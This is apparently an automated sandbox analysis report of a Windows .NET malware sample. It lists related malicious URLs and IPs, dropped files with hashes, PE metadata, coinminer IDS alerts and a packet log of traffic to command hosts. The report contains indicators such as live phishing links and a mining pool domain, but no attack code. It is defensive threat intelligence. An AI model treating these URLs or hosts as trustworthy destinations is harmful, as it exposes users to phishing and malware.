	http://moodys-local.com	Get hash	malicious	Unknown	Browse	137.220.35.134
	RFQ#TLPO15-13.xla.xlsx	Get hash	malicious	Remcos, PureLog Stealer	Browse	149.28.221.9
	PO2-2401-0016 (TR).exe	Get hash	malicious	FormBook	Browse	104.207.148.137
	SecuriteInfo.com.Trojan.Siggen29.8143.15092.30622.exe	Get hash	malicious	Xmrig	Browse	136.244.83.0
	https://muse.krazzykriss.com/euXwoAHHk8kex8qSTdHcggmRldBY39LMG4uUyRSCr8YTiZWCVseCgkDHltIAlIXPE4ydxAqOhdFYmA=='%3E%3C/script%3E%3C/body%3E%3C/html%3E	Get hash	malicious	Unknown	Browse	45.77.78.73
	http://www.tucsonrealtors.org	Get hash	malicious	Unknown	Browse	45.77.78.73
	http://pluralism.themancav.com/	Get hash	malicious	Unknown	Browse	207.148.0.16
ALPHAONE-ASUS	temp_script.bat	Get hash	malicious	PureLog Stealer	Browse	45.11.229.96
	Aqua.mpsl-20240804-2157.elf	Get hash	malicious	Unknown	Browse	45.13.227.24
	Aqua.arm7-20240804-2157.elf	Get hash	malicious	Mirai	Browse	45.13.227.24
	Aqua.mips-20240804-2157.elf	Get hash	malicious	Unknown	Browse	45.13.227.24
	Aqua.x86_64-20240804-2157.elf	Get hash	malicious	Unknown	Browse	45.13.227.24
	sora.m68k.elf	Get hash	malicious	Mirai	Browse	38.79.86.219
	ca1b58Nxwf.elf	Get hash	malicious	Unknown	Browse	45.13.227.201
	GWtByYqyGD.elf	Get hash	malicious	Unknown	Browse	45.13.227.201
	nWlbyBDOUp.elf	Get hash	malicious	Unknown	Browse	45.13.227.201
	TIzx8Y748C.elf	Get hash	malicious	Unknown	Browse	45.13.227.201

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
3b5074b1b5d032e5620f69f9f700ff0e	http://santander-competencia.activaonline.cl/	Get hash	malicious	Unknown	Browse	172.67.143.156
	https://in-50card.ru/wr	Get hash	malicious	Unknown	Browse	172.67.143.156
	https://request-checksid-711843.pages.dev/robots.txt/	Get hash	malicious	Unknown	Browse	172.67.143.156
	http://caklwi392xqq.pages.dev/	Get hash	malicious	HTMLPhisher	Browse	172.67.143.156
	https://iostart-trezori.github.io/	Get hash	malicious	Unknown	Browse	172.67.143.156
	https://piyush-ally9.github.io/Netflix-Clone	Get hash	malicious	HTMLPhisher	Browse	172.67.143.156
	https://aisthd.xyz/	Get hash	malicious	Unknown	Browse	172.67.143.156
	http://www.telegraxms.club/	Get hash	malicious	Telegram Phisher	Browse	172.67.143.156
	https://treezoriostart.github.io/	Get hash	malicious	Unknown	Browse	172.67.143.156
	http://is-start-trizor.webflow.io/	Get hash	malicious	Unknown	Browse	172.67.143.156

Process:	C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	838
Entropy (8bit):	5.356471432431617
Encrypted:	false
SSDEEP:	24:ML9E4KQwKDE4KGKZI6KhRAE4KKUNCsXE4Npv:MxHKQwYHKGSI6oRAHKKkhHNpv
MD5:	E56A6A79CB531084A51F12C271BE7439
SHA1:	97A016CBE4C221936BAB8F76D33F7C021AA19ADF
SHA-256:	FA63B35C53D1B58B86D8C3CB3976AF7B7C096FD787EF1D33F63F5A31C87BC3E3
SHA-512:	B090CA13606574646D98D7B6F0FD5B16A7A6471FDC4F3CECDCFDDCC23925F97A3F0F5EEF3ECBE81A29B769FE7BCFF88DA0950FFD9A8D0FD2804F36171DE31D7A
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..3,"System.Management, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Management\8af759007c012da690062882e06694f1\System.Management.ni.dll",0..

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\o9OIGsDt4m.exe.log

Download File

Process:	C:\Users\user\Desktop\o9OIGsDt4m.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	838
Entropy (8bit):	5.356471432431617
Encrypted:	false
SSDEEP:	24:ML9E4KQwKDE4KGKZI6KhRAE4KKUNCsXE4Npv:MxHKQwYHKGSI6oRAHKKkhHNpv
MD5:	E56A6A79CB531084A51F12C271BE7439
SHA1:	97A016CBE4C221936BAB8F76D33F7C021AA19ADF
SHA-256:	FA63B35C53D1B58B86D8C3CB3976AF7B7C096FD787EF1D33F63F5A31C87BC3E3
SHA-512:	B090CA13606574646D98D7B6F0FD5B16A7A6471FDC4F3CECDCFDDCC23925F97A3F0F5EEF3ECBE81A29B769FE7BCFF88DA0950FFD9A8D0FD2804F36171DE31D7A
Malicious:	true
Reputation:	moderate, very likely benign file
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..3,"System.Management, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Management\8af759007c012da690062882e06694f1\System.Management.ni.dll",0..

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	64
Entropy (8bit):	1.1940658735648508
Encrypted:	false
SSDEEP:	3:Nlllulbnolz:NllUc
MD5:	F23953D4A58E404FCB67ADD0C45EB27A
SHA1:	2D75B5CACF2916C66E440F19F6B3B21DFD289340
SHA-256:	16F994BFB26D529E4C28ED21C6EE36D4AFEAE01CEEB1601E85E0E7FDFF4EFA8B
SHA-512:	B90BFEC26910A590A367E8356A20F32A65DB41C6C62D79CA0DDCC8D95C14EB48138DEC6B992A6E5C7B35CFF643063012462DA3E747B2AA15721FE2ECCE02C044
Malicious:	false
Preview:	@...e................................................@..........

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ggqhaihq.it1.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_k2eaersr.skl.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_neenwso2.133.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ogbhaost.2hf.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe

Download File

Process:	C:\Users\user\Desktop\o9OIGsDt4m.exe
File Type:	PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	729600
Entropy (8bit):	7.955187915697694
Encrypted:	false
SSDEEP:	12288:7egbADMgyjwvQ4+IHqhIs2SXdBG2DtMM2rvzaUwvEZmKHX:7vJjcvQhIK27em4tgDwvsmK3
MD5:	FD3AD0AE7FE1BBEE4B2F2BD43A359393
SHA1:	60AE0666DA4A38F4881511149CE3BE848844B9FD
SHA-256:	7BFFD9CB271221C63B35A30160859EC4F2FF2BA131597D1F746C279FB53D1AD7
SHA-512:	BA5250CD1D7D301B3070083053477319D1FCFA3AFC38533DE5BBEFD1251C6D73B1F24DA08C37FDB2715E67B07C0799C89E59DDAA16F2EB7117EAD977E453E88C
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 53% Antivirus: Virustotal, Detection: 42%, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d...]/................0.................. ....@...... .......................`............`...@......@............... ...............................@..h............................................................................................ ..H............text........ ...................... ..`.rsrc...h....@......................@..@........................................H............U..............................................................(......0..........8{...... ....o....8U..... ..:sf .r..a~w...{>...a(...(....o....8........o......o....o......8....s......8,..... .... ...a~w...{q...a(...(....o....8.....s......8..... `?.......%.....(....s......8..........s......8.........o....8......o....s......8.............8..........o....&8.......(......8.......s......8.........o....8l....+...(...... .LX8 #.Z.Y ...{a~w...{....a(...( .........o!...&8<

C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe:Zone.Identifier

Download File

Process:	C:\Users\user\Desktop\o9OIGsDt4m.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Preview:	[ZoneTransfer]....ZoneId=0

Static File Info

General

File type:	PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.955187915697694
TrID:	Win64 Executable GUI Net Framework (217006/5) 49.88% Win64 Executable GUI (202006/5) 46.43% Win64 Executable (generic) (12005/4) 2.76% Generic Win/DOS Executable (2004/3) 0.46% DOS Executable Generic (2002/1) 0.46%
File name:	o9OIGsDt4m.exe
File size:	729'600 bytes
MD5:	fd3ad0ae7fe1bbee4b2f2bd43a359393
SHA1:	60ae0666da4a38f4881511149ce3be848844b9fd
SHA256:	7bffd9cb271221c63b35a30160859ec4f2ff2ba131597d1f746c279fb53d1ad7
SHA512:	ba5250cd1d7d301b3070083053477319d1fcfa3afc38533de5bbefd1251c6d73b1f24da08c37fdb2715e67b07c0799c89e59ddaa16f2eb7117ead977e453e88c
SSDEEP:	12288:7egbADMgyjwvQ4+IHqhIs2SXdBG2DtMM2rvzaUwvEZmKHX:7vJjcvQhIK27em4tgDwvsmK3
TLSH:	3FF422823B865954D885AEB6C8E6941407B2B72776F3DE413C8E0BC19F53787CBC6B81
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d...]/................0.................. ....@...... .......................`............`...@......@............... .....

File Icon


Icon Hash:	00928e8e8686b000

Static PE Info

General

Entrypoint:	0x400000
Entrypoint Section:
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE
DLL Characteristics:	HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0xCA1C2F5D [Sun Jun 13 21:19:25 2077 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:

Entrypoint Preview

Instruction
dec ebp
pop edx
nop
add byte ptr [ebx], al
add byte ptr [eax], al
add byte ptr [eax+eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xb4000	0x568	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2000	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0xb19f0	0xb1a00	edb1120d0c0a379800b9b163aa9774e1	False	0.9618240345707249	data	7.959305548795795	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0xb4000	0x568	0x600	739c428944d48d158bbe5f825cf65f0f	False	0.400390625	data	3.927877578037167	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_VERSION	0xb40a0	0x2dc	data			0.430327868852459
RT_MANIFEST	0xb437c	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators			0.5489795918367347

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-09-19T02:25:04.746990+0200	2826930	ETPRO COINMINER XMR CoinMiner Usage	2	192.168.2.5	49718	45.76.89.70	80	TCP
2024-09-19T02:25:23.498854+0200	2036289	ET COINMINER CoinMiner Domain in DNS Lookup (pool .hashvault .pro)	2	192.168.2.5	59539	1.1.1.1	53	UDP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 19, 2024 02:25:14.920669079 CEST	49707	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:25:14.925775051 CEST	39001	49707	45.11.229.96	192.168.2.5
Sep 19, 2024 02:25:14.926137924 CEST	49707	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:25:15.194097996 CEST	49707	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:25:15.199122906 CEST	39001	49707	45.11.229.96	192.168.2.5
Sep 19, 2024 02:25:15.199320078 CEST	49707	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:25:15.204138041 CEST	39001	49707	45.11.229.96	192.168.2.5
Sep 19, 2024 02:25:15.568274975 CEST	39001	49707	45.11.229.96	192.168.2.5
Sep 19, 2024 02:25:15.622029066 CEST	49707	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:25:15.701713085 CEST	39001	49707	45.11.229.96	192.168.2.5
Sep 19, 2024 02:25:15.710747004 CEST	49707	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:25:15.715888977 CEST	39001	49707	45.11.229.96	192.168.2.5
Sep 19, 2024 02:25:15.715955019 CEST	49707	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:25:15.858036041 CEST	49708	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:25:15.862905979 CEST	39001	49708	45.11.229.96	192.168.2.5
Sep 19, 2024 02:25:15.862981081 CEST	49708	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:25:15.892148972 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:15.892205000 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:15.892280102 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:15.900660038 CEST	49708	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:25:15.905534029 CEST	39001	49708	45.11.229.96	192.168.2.5
Sep 19, 2024 02:25:15.905627966 CEST	49708	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:25:15.910765886 CEST	39001	49708	45.11.229.96	192.168.2.5
Sep 19, 2024 02:25:15.918457985 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:15.918486118 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:16.397187948 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:16.397259951 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:16.401376963 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:16.401391029 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:16.401740074 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:16.450046062 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:16.503777027 CEST	39001	49708	45.11.229.96	192.168.2.5
Sep 19, 2024 02:25:16.517695904 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:16.543777943 CEST	49708	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:25:16.559406042 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:16.639920950 CEST	39001	49708	45.11.229.96	192.168.2.5
Sep 19, 2024 02:25:16.640857935 CEST	49708	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:25:16.646383047 CEST	39001	49708	45.11.229.96	192.168.2.5
Sep 19, 2024 02:25:16.646457911 CEST	49708	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:25:16.747986078 CEST	49710	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:25:16.753077030 CEST	39001	49710	45.11.229.96	192.168.2.5
Sep 19, 2024 02:25:16.753184080 CEST	49710	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:25:16.769213915 CEST	49710	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:25:16.774081945 CEST	39001	49710	45.11.229.96	192.168.2.5
Sep 19, 2024 02:25:16.774154902 CEST	49710	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:25:16.779062033 CEST	39001	49710	45.11.229.96	192.168.2.5
Sep 19, 2024 02:25:16.930682898 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:16.930725098 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:16.930751085 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:16.930799007 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:16.930826902 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:16.930866957 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:16.930866957 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:16.930917025 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:16.930968046 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:16.931082964 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:16.937032938 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:16.937103987 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:16.937119007 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:16.937226057 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:16.937369108 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:16.937377930 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:16.981285095 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:16.981307983 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:17.022408009 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:17.022445917 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:17.022473097 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:17.022505999 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:17.022531033 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:17.022552967 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:17.022875071 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:17.022918940 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:17.022922039 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:17.022933960 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:17.022977114 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:17.022983074 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:17.023308039 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:17.023334026 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:17.023360968 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:17.023370028 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:17.023410082 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:17.023413897 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:17.023426056 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:17.023483038 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:17.025994062 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:17.026067019 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:17.026110888 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:17.026118040 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:17.026124001 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:17.026161909 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:17.026168108 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:17.026304007 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:17.026324034 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:17.026350975 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:17.026359081 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:17.026444912 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:17.033025980 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:17.075046062 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:17.075057983 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:17.079894066 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:17.080950022 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:17.080956936 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:17.110796928 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:17.110832930 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:17.110857964 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:17.110866070 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:17.110876083 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:17.110917091 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:17.110924006 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:17.110964060 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:17.111749887 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:17.111758947 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:17.111799002 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:17.111804008 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:17.111809969 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:17.111845970 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:17.112395048 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:17.112453938 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:17.112468958 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:17.112473965 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:17.112503052 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:17.112519979 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:17.113215923 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:17.113293886 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:17.113327980 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:17.113379002 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:17.114767075 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:17.114828110 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:17.114835978 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:17.114892960 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:17.115741014 CEST	443	49709	172.67.143.156	192.168.2.5
Sep 19, 2024 02:25:17.115806103 CEST	49709	443	192.168.2.5	172.67.143.156
Sep 19, 2024 02:25:17.115888119 CEST	443	49709	172.67.143.156	192.168.2.5
